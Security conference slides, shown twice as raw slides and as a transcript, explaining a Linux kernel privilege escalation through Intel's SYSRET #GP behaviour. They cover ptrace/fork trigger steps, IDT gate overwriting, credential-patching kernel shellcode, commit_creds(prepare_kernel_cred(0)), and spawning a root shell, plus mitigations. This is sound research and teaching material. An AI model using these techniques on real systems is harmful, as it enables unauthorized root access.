Exploiting the Linux Kernel via 
Intel's SYSRET Implementation 
Niko@FluxFingers
Outline 
● Syscalls and Context Switches 
● Canonical Addresses 
● SYSRET #GP Triggering 
● Step by Step Exploitation and Rooting
Linux x86_64 Syscalls 
● On OLD x86 Processors int $0x80 with Nr. in %eax 
and Params in %ebx, %ecx, etc 
○ However it’s super slow and got replaced with Intel’s 
SYSENTER mechanism 
● x86_64 uses AMD’s SYSCALL with Params in %rdi, % 
rsi, %rdx, %rcx, ... 
○ Faster to handle than the whole interrupt path 
○ Intel CPUs adapted SYSCALL according to AMD’s specs since it 
became the standard syscall-mechanism
SYSCALL/SYSRET 
● Whenever a syscall is invoked via SYSCALL a 
context switch to kernel mode takes place 
○ When leaving the syscall the kernel needs to restore specific 
userland registers 
○ And transfer back to ring3 with SYSRET 
● SYSRET is fast since it “only” needs to: 
○ Load the saved %rip from %rcx 
○ Swap %cs back to ring3 mode 
● The kernel itself has to make sure to restore all other 
userland registers before executing SYSRET
SYSCALL/SYSRET 
0x0000000000000000 
0x0000000000400000 
Process (/bin/cat) 
.text, .data, .bss, Heap 
0x00000000006XXXXX 
Shared Libraries 
0x00007ffffXXXXXXX 
Stack 
0x00007fXXXXXXXXXX 
VSYSCALL 
0xffffffffff600000 
0xffffffff80000000 
Kernel Memory 
SYSCALL
SYSCALL/SYSRET 
0x0000000000000000 
0x0000000000400000 
Process (/bin/cat) 
.text, .data, .bss, Heap 
0x00000000006XXXXX 
Shared Libraries 
0x00007ffffXXXXXXX 
Stack 
0x00007fXXXXXXXXXX 
VSYSCALL 
0xffffffffff600000 
0xffffffff80000000 
Kernel Memory 
SYSRET
How Linux handles SYSRET 
● arch/x86/kernel/entry_64.S: 
ret_from_sys_call: 
movl $_TIF_ALLWORK_MASK,%edi 
... 
sysret_check: 
... 
movq RIP-ARGOFFSET(%rsp),%rcx 
CFI_REGISTER rip,rcx 
RESTORE_ARGS 1,-ARG_SKIP,0 
movq PER_CPU_VAR(old_rsp), %rsp 
USERGS_SYSRET64 
● The kernel makes sure to restore %rsp and %gs etc 
and calls SYSRET in the end
Canonical Addresses 
● On x86_64 registers are 64 bit wide 
● The instruction pointer (%rip) can only use 48 bits 
○ 48 Bits == balanced value for page-tables/accessible memory 
● Leftover bits of %rip used for CPU specific tricks 
○ like NX bit on position 63 
● Meaning the value of %rip has to be “canonical” aka 
between 
○ 0x0000000000000000 -> 0x00007FFFFFFFFFFF 
○ 0x00FFFFFFFFFFFFFF -> 0xFFFF800000000000 
● (Bits 48 .. 63 have to be copies of bit 47) 
● Non-canonical values in %rip are not allowed and will 
trigger exceptions in certain cases
Non-canonical addresses and SYSRET 
● Whenever a SYSRET is executed and the CPU sees 
a non-canonical value in %rcx it triggers a #GP 
● AMD specs however never defined when the #GP 
will actually happen 
● Clever researches at XEN found out AMD CPUs will 
trigger #GP when back in Usermode 
● Not so on Intel ...
Intel’s Version of SYSRET 
● AMD’s specs omitted the check for non-canonical 
values in %rcx / %rip 
● Intel decided to check for non-canonical values 
before the privilege level is changed
Intel’s Version of SYSRET 
● Triggering a #GP from kernel mode has 
consequences on Linux 
● Recall that prior to executing SYSRET Linux 
restores the userland %rsp and swaps %gs 
● Intel’s SYSRET will #GP on the userland stack while 
still being in ring0
#GP on userland %rsp 
● #GP is an exception reached via an IDT entry: 
arch/x86/kernel/traps.c: 
set_intr_gate(X86_TRAP_GP, general_protection); 
● Where general_protection resolves to an error_entry macro in 
arch/x86/kernel/entry_64.S: 
.macro errorentry sym do_sym 
ENTRY(sym) 
XCPT_FRAME 
ASM_CLAC 
PARAVIRT_ADJUST_EXCEPTION_FRAME 
subq $ORIG_RAX-R15, %rsp 
CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15 
call error_entry 
...
#GP on userland %rsp 
● error_entry sets up an exception stack and backups all registers: 
ENTRY(error_entry) 
XCPT_FRAME 
CFI_ADJUST_CFA_OFFSET 15*8 
cld 
movq_cfi rdi, RDI+8 
movq_cfi rsi, RSI+8 
movq_cfi rdx, RDX+8 
… 
● where movq_cfi is defined as 
.macro movq_cfi reg offset=0 
movq %reg, offset(%rsp) 
CFI_REL_OFFSET reg, offset 
.endm
#GP on userland %rsp 
● When setting up the stack frame in error_entry all 
(general) registers are saved to x(%rsp) / [rsp+x] 
● The kernel restored the userland %rsp and 
registers before SYSRET 
● => Arbitrary memory write while in ring0 
● Classic possibility for privilege escalation
Linux’ Protection against n/c %rip 
● This behaviour already bit Linux in 2006 (CVE- 
2006-0744) 
● To make sure no code lands up in non-canonical 
address space (or right before) a guard page was 
introduced 
● mmap(0x7ffffffff000, 4096, PROT_READ … will 
return ENOMEM 
● This way SYSRET “shouldn’t” return to any n/c 
address
Linux’ Protection against n/c %rip 
● Another possibility is using a “safe” IRET path for 
returning back to ring3 
○ IRET requires ring3-backup on the stack to return to user-code 
○ Is slower than SYSRET 
● The ptrace interface sets an IRET path most of the 
time 
● However some syscalls use a SYSRET path albeit 
being ptraced 
● One example is fork() since it signals with 
ptrace_event() that does not force IRET
Crash PoC 
● fork() a child 
● Child sets PTRACE_TRACEME 
● Raise SIGSTOP 
● Parent sets PTRACE_O_TRACEFORK 
● Child fork()s again 
● Parent catches this fork 
● And uses PTRACE_SETREGS to set %rip to n/c 
● Pivots %rsp to arbitrary place 
● And PTRACE_CONTINUEs 
● fork() will return with SYSRET with n/c %rcx 
● CPU will #GP, Pagefault, Doublefault and Panic
How to get root
The plan 
● We need to get Kernel Code Execution between 
the #GP and Panic 
● Then restore the damage we have done 
● Set credentials of current process to 0 
● Return back to userland 
● And open shell
The target 
● Since #GP will always trigger a Pagefault and 
Doublefault we can pivot %rsp back to IDT 
● And set 2 specific registers to craft a fake IDT gate 
● That will be placed instead of the orig Page- or 
Doublefault handler.
IDT Layout 
● We can read IDTR with the sidt-instruction
IDT Gate Entry 
● And setup a new gate with modified “Offsets”
The target 
● Before we trigger #GP we can allocate a Landing 
Area in Userland 
● Where we copy code that will be executed 
● Craft a fake IDT gate that points to this area 
● Triggering #GP will then overwrite e.g. Doublefault 
with the fake gate 
● And the kernel will jump to Userland and execute 
our code with kernel privs
Kernel Shellcode 
● Inside this code we will have to swapgs in order to 
access kernel structures 
● Then we carefully rebuild all IDT entries that were 
trashed in the overwrite process 
● Then we can raise process credentials
Process structures 
● Each process in userland has an associated kernel 
structure (thread_union) that builds the kernel 
stack: 
thread_union 
thread_info 
Kernel Stack
Process structures 
● thread_info itself has an element that points to 
task_struct 
thread_info 
*task_struct 
*exec_domain 
…
Process structures < 2.6.29 
● task_struct contains lots of info about the running 
task 
● and its credentials 
task_struct 
state 
stack 
usage 
... 
uid, guid, caps,...
Process structures < 2.6.29 
task_struct 
state 
stack 
usage 
... 
uid, guid, caps,... 
thread_info 
*task_struct 
*exec_domain 
… 
thread_union 
thread_info 
Kernel Stack
Kernel Shellcode 
● On < 2.6.29 raising process credentials is a matter 
of finding uid, gid and caps in task_struct 
● And patching them to 0 
● Luckily %gs in kernel mode contains offset to 
x8664_pda (/include/asm-x86/pda.h) 
/* Per processor datastructure. %gs points to it while the kernel runs */ 
struct x8664_pda { 
struct task_struct *pcurrent; /* 0 Current process */ 
unsigned long data_offset; /* 8 Per cpu data offset from linker address */ 
unsigned long kernelstack; /* 16 top of kernel stack for current */ 
unsigned long oldrsp; /* 24 user rsp for system call */ 
int irqcount; /* 32 Irq nesting counter. Starts with -1 */ 
int cpunumber; /* 36 Logical CPU number */ 
#ifdef CONFIG_CC_STACKPROTECTOR 
unsigned long stack_canary; 
...
Kernel Shellcode 
● %gs:0 will point to task_struct 
● So we can simply: 
asm("movq %%gs:0, %0" : "=r"(ptr)); 
cred = (uint32_t *)ptr; 
for (i = 0; i < 1000; i++, cred++) { 
if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid && 
cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) { 
cred[0] = cred[1] = cred[2] = cred[3] = 0; 
cred[4] = cred[5] = cred[6] = cred[7] = 0; 
● Where uid/gid are getuid() and getdid() 
● And our process will be root
Kernel Shellcode 
● On > 2.6.29 x8664_pda is removed 
● And task_struct contains a new member called 
cred (credential records) 
● If %rsp wasn’t modified we could walk back to top 
of stack to find thread_info 
● And do heuristic scanning to find thread_info- 
>task_struct->creds->uid/gid 
● However with credential records come two new 
functions 
● prepare_kernel_cred / commit_creds
Kernel Shellcode 
● prepare_kernel_cred creates a new clean 
credentials structure 
● commit_creds installs the new cred to the current 
task 
● Both symbols are exported through /proc/kallsyms 
or /boot/System.map 
● Kernel shellcode just needs to 
commit_creds(prepare_kernel_cred(0)); 
● And we’re root again
Kernel Shellcode 
● Next we will have to cleanly return back to 
userland 
● Easiest method is to use IRET: 
__asm__ __volatile__( 
"movq %0, 0x20(%%rsp);" 
"movq %1, 0x18(%%rsp);" 
"movq %2, 0x10(%%rsp);" 
"movq %3, 0x08(%%rsp);" 
"movq %4, 0x00(%%rsp);" 
"swapgs;" 
"iretq;" 
:: "i"(USER_SS), 
"i"(user_stack), 
"i"(USER_FL), 
"i"(USER_CS), 
"i"(user_code) 
); 
● Where user_code points to memory in userland 
that should be executed when kernel exits
Popping uid=0(root) 
● user_code can do anything now since it runs as 
root 
● So we can simply execve(/bin/sh) from there 
● However that happens inside the child so we have 
to bring the rootshell back to the parent 
● Or we just chmod() or setxattr() to drop a root-shell
Demo Time
Liminations 
● These techniques work well with 2.6.18 - 3.9.X 
3.10 mitigates the IDT attack by remapping it to 
rodata (arch/x86/kernel/traps.c) 
__set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO); 
idt_descr.address = fix_to_virt(FIX_RO_IDT); 
● CPUs with SMAP/SMEP will detect accessing 
userland code while still being in ring0 
● Grsecurity will provide handful of protections to 
make this bug a pain to exploit 
○ GRKERNSEC_RANDSTRUCT 
○ PAX_MEMORY_UDEREF 
○ GRKERNSEC_HIDESYM 
○ ...
Further thoughts 
● Linux fix is weird (“only” forces ptrace_stop() to 
use IRET) 
● Syscalls can still return via SYSRET 
● Also bug within SYSRET is still present 
● Since it’s a hardware issue it might be present in 
other OSes in different variations (OHAI 2006) 
● Any1 wanna check FreeBSD …?
Questions?

Exploiting the Linux Kernel via Intel's SYSRET Implementation

  • 1.
    Exploiting the LinuxKernel via Intel's SYSRET Implementation Niko@FluxFingers
  • 2.
    Outline ● Syscallsand Context Switches ● Canonical Addresses ● SYSRET #GP Triggering ● Step by Step Exploitation and Rooting
  • 3.
    Linux x86_64 Syscalls ● On OLD x86 Processors int $0x80 with Nr. in %eax and Params in %ebx, %ecx, etc ○ However it’s super slow and got replaced with Intel’s SYSENTER mechanism ● x86_64 uses AMD’s SYSCALL with Params in %rdi, % rsi, %rdx, %rcx, ... ○ Faster to handle than the whole interrupt path ○ Intel CPUs adapted SYSCALL according to AMD’s specs since it became the standard syscall-mechanism
  • 4.
    SYSCALL/SYSRET ● Whenevera syscall is invoked via SYSCALL a context switch to kernel mode takes place ○ When leaving the syscall the kernel needs to restore specific userland registers ○ And transfer back to ring3 with SYSRET ● SYSRET is fast since it “only” needs to: ○ Load the saved %rip from %rcx ○ Swap %cs back to ring3 mode ● The kernel itself has to make sure to restore all other userland registers before executing SYSRET
  • 5.
    SYSCALL/SYSRET 0x0000000000000000 0x0000000000400000 Process (/bin/cat) .text, .data, .bss, Heap 0x00000000006XXXXX Shared Libraries 0x00007ffffXXXXXXX Stack 0x00007fXXXXXXXXXX VSYSCALL 0xffffffffff600000 0xffffffff80000000 Kernel Memory SYSCALL
  • 6.
    SYSCALL/SYSRET 0x0000000000000000 0x0000000000400000 Process (/bin/cat) .text, .data, .bss, Heap 0x00000000006XXXXX Shared Libraries 0x00007ffffXXXXXXX Stack 0x00007fXXXXXXXXXX VSYSCALL 0xffffffffff600000 0xffffffff80000000 Kernel Memory SYSRET
  • 7.
    How Linux handlesSYSRET ● arch/x86/kernel/entry_64.S: ret_from_sys_call: movl $_TIF_ALLWORK_MASK,%edi ... sysret_check: ... movq RIP-ARGOFFSET(%rsp),%rcx CFI_REGISTER rip,rcx RESTORE_ARGS 1,-ARG_SKIP,0 movq PER_CPU_VAR(old_rsp), %rsp USERGS_SYSRET64 ● The kernel makes sure to restore %rsp and %gs etc and calls SYSRET in the end
  • 8.
    Canonical Addresses ●On x86_64 registers are 64 bit wide ● The instruction pointer (%rip) can only use 48 bits ○ 48 Bits == balanced value for page-tables/accessible memory ● Leftover bits of %rip used for CPU specific tricks ○ like NX bit on position 63 ● Meaning the value of %rip has to be “canonical” aka between ○ 0x0000000000000000 -> 0x00007FFFFFFFFFFF ○ 0x00FFFFFFFFFFFFFF -> 0xFFFF800000000000 ● (Bits 48 .. 63 have to be copies of bit 47) ● Non-canonical values in %rip are not allowed and will trigger exceptions in certain cases
  • 9.
    Non-canonical addresses andSYSRET ● Whenever a SYSRET is executed and the CPU sees a non-canonical value in %rcx it triggers a #GP ● AMD specs however never defined when the #GP will actually happen ● Clever researches at XEN found out AMD CPUs will trigger #GP when back in Usermode ● Not so on Intel ...
  • 10.
    Intel’s Version ofSYSRET ● AMD’s specs omitted the check for non-canonical values in %rcx / %rip ● Intel decided to check for non-canonical values before the privilege level is changed
  • 11.
    Intel’s Version ofSYSRET ● Triggering a #GP from kernel mode has consequences on Linux ● Recall that prior to executing SYSRET Linux restores the userland %rsp and swaps %gs ● Intel’s SYSRET will #GP on the userland stack while still being in ring0
  • 12.
    #GP on userland%rsp ● #GP is an exception reached via an IDT entry: arch/x86/kernel/traps.c: set_intr_gate(X86_TRAP_GP, general_protection); ● Where general_protection resolves to an error_entry macro in arch/x86/kernel/entry_64.S: .macro errorentry sym do_sym ENTRY(sym) XCPT_FRAME ASM_CLAC PARAVIRT_ADJUST_EXCEPTION_FRAME subq $ORIG_RAX-R15, %rsp CFI_ADJUST_CFA_OFFSET ORIG_RAX-R15 call error_entry ...
  • 13.
    #GP on userland%rsp ● error_entry sets up an exception stack and backups all registers: ENTRY(error_entry) XCPT_FRAME CFI_ADJUST_CFA_OFFSET 15*8 cld movq_cfi rdi, RDI+8 movq_cfi rsi, RSI+8 movq_cfi rdx, RDX+8 … ● where movq_cfi is defined as .macro movq_cfi reg offset=0 movq %reg, offset(%rsp) CFI_REL_OFFSET reg, offset .endm
  • 14.
    #GP on userland%rsp ● When setting up the stack frame in error_entry all (general) registers are saved to x(%rsp) / [rsp+x] ● The kernel restored the userland %rsp and registers before SYSRET ● => Arbitrary memory write while in ring0 ● Classic possibility for privilege escalation
  • 15.
    Linux’ Protection againstn/c %rip ● This behaviour already bit Linux in 2006 (CVE- 2006-0744) ● To make sure no code lands up in non-canonical address space (or right before) a guard page was introduced ● mmap(0x7ffffffff000, 4096, PROT_READ … will return ENOMEM ● This way SYSRET “shouldn’t” return to any n/c address
  • 16.
    Linux’ Protection againstn/c %rip ● Another possibility is using a “safe” IRET path for returning back to ring3 ○ IRET requires ring3-backup on the stack to return to user-code ○ Is slower than SYSRET ● The ptrace interface sets an IRET path most of the time ● However some syscalls use a SYSRET path albeit being ptraced ● One example is fork() since it signals with ptrace_event() that does not force IRET
  • 17.
    Crash PoC ●fork() a child ● Child sets PTRACE_TRACEME ● Raise SIGSTOP ● Parent sets PTRACE_O_TRACEFORK ● Child fork()s again ● Parent catches this fork ● And uses PTRACE_SETREGS to set %rip to n/c ● Pivots %rsp to arbitrary place ● And PTRACE_CONTINUEs ● fork() will return with SYSRET with n/c %rcx ● CPU will #GP, Pagefault, Doublefault and Panic
  • 18.
  • 19.
    The plan ●We need to get Kernel Code Execution between the #GP and Panic ● Then restore the damage we have done ● Set credentials of current process to 0 ● Return back to userland ● And open shell
  • 20.
    The target ●Since #GP will always trigger a Pagefault and Doublefault we can pivot %rsp back to IDT ● And set 2 specific registers to craft a fake IDT gate ● That will be placed instead of the orig Page- or Doublefault handler.
  • 21.
    IDT Layout ●We can read IDTR with the sidt-instruction
  • 22.
    IDT Gate Entry ● And setup a new gate with modified “Offsets”
  • 23.
    The target ●Before we trigger #GP we can allocate a Landing Area in Userland ● Where we copy code that will be executed ● Craft a fake IDT gate that points to this area ● Triggering #GP will then overwrite e.g. Doublefault with the fake gate ● And the kernel will jump to Userland and execute our code with kernel privs
  • 24.
    Kernel Shellcode ●Inside this code we will have to swapgs in order to access kernel structures ● Then we carefully rebuild all IDT entries that were trashed in the overwrite process ● Then we can raise process credentials
  • 25.
    Process structures ●Each process in userland has an associated kernel structure (thread_union) that builds the kernel stack: thread_union thread_info Kernel Stack
  • 26.
    Process structures ●thread_info itself has an element that points to task_struct thread_info *task_struct *exec_domain …
  • 27.
    Process structures <2.6.29 ● task_struct contains lots of info about the running task ● and its credentials task_struct state stack usage ... uid, guid, caps,...
  • 28.
    Process structures <2.6.29 task_struct state stack usage ... uid, guid, caps,... thread_info *task_struct *exec_domain … thread_union thread_info Kernel Stack
  • 29.
    Kernel Shellcode ●On < 2.6.29 raising process credentials is a matter of finding uid, gid and caps in task_struct ● And patching them to 0 ● Luckily %gs in kernel mode contains offset to x8664_pda (/include/asm-x86/pda.h) /* Per processor datastructure. %gs points to it while the kernel runs */ struct x8664_pda { struct task_struct *pcurrent; /* 0 Current process */ unsigned long data_offset; /* 8 Per cpu data offset from linker address */ unsigned long kernelstack; /* 16 top of kernel stack for current */ unsigned long oldrsp; /* 24 user rsp for system call */ int irqcount; /* 32 Irq nesting counter. Starts with -1 */ int cpunumber; /* 36 Logical CPU number */ #ifdef CONFIG_CC_STACKPROTECTOR unsigned long stack_canary; ...
  • 30.
    Kernel Shellcode ●%gs:0 will point to task_struct ● So we can simply: asm("movq %%gs:0, %0" : "=r"(ptr)); cred = (uint32_t *)ptr; for (i = 0; i < 1000; i++, cred++) { if (cred[0] == uid && cred[1] == uid && cred[2] == uid && cred[3] == uid && cred[4] == gid && cred[5] == gid && cred[6] == gid && cred[7] == gid) { cred[0] = cred[1] = cred[2] = cred[3] = 0; cred[4] = cred[5] = cred[6] = cred[7] = 0; ● Where uid/gid are getuid() and getdid() ● And our process will be root
  • 31.
    Kernel Shellcode ●On > 2.6.29 x8664_pda is removed ● And task_struct contains a new member called cred (credential records) ● If %rsp wasn’t modified we could walk back to top of stack to find thread_info ● And do heuristic scanning to find thread_info- >task_struct->creds->uid/gid ● However with credential records come two new functions ● prepare_kernel_cred / commit_creds
  • 32.
    Kernel Shellcode ●prepare_kernel_cred creates a new clean credentials structure ● commit_creds installs the new cred to the current task ● Both symbols are exported through /proc/kallsyms or /boot/System.map ● Kernel shellcode just needs to commit_creds(prepare_kernel_cred(0)); ● And we’re root again
  • 33.
    Kernel Shellcode ●Next we will have to cleanly return back to userland ● Easiest method is to use IRET: __asm__ __volatile__( "movq %0, 0x20(%%rsp);" "movq %1, 0x18(%%rsp);" "movq %2, 0x10(%%rsp);" "movq %3, 0x08(%%rsp);" "movq %4, 0x00(%%rsp);" "swapgs;" "iretq;" :: "i"(USER_SS), "i"(user_stack), "i"(USER_FL), "i"(USER_CS), "i"(user_code) ); ● Where user_code points to memory in userland that should be executed when kernel exits
  • 34.
    Popping uid=0(root) ●user_code can do anything now since it runs as root ● So we can simply execve(/bin/sh) from there ● However that happens inside the child so we have to bring the rootshell back to the parent ● Or we just chmod() or setxattr() to drop a root-shell
  • 35.
  • 36.
    Liminations ● Thesetechniques work well with 2.6.18 - 3.9.X 3.10 mitigates the IDT attack by remapping it to rodata (arch/x86/kernel/traps.c) __set_fixmap(FIX_RO_IDT, __pa_symbol(idt_table), PAGE_KERNEL_RO); idt_descr.address = fix_to_virt(FIX_RO_IDT); ● CPUs with SMAP/SMEP will detect accessing userland code while still being in ring0 ● Grsecurity will provide handful of protections to make this bug a pain to exploit ○ GRKERNSEC_RANDSTRUCT ○ PAX_MEMORY_UDEREF ○ GRKERNSEC_HIDESYM ○ ...
  • 37.
    Further thoughts ●Linux fix is weird (“only” forces ptrace_stop() to use IRET) ● Syscalls can still return via SYSRET ● Also bug within SYSRET is still present ● Since it’s a hardware issue it might be present in other OSes in different variations (OHAI 2006) ● Any1 wanna check FreeBSD …?
  • 38.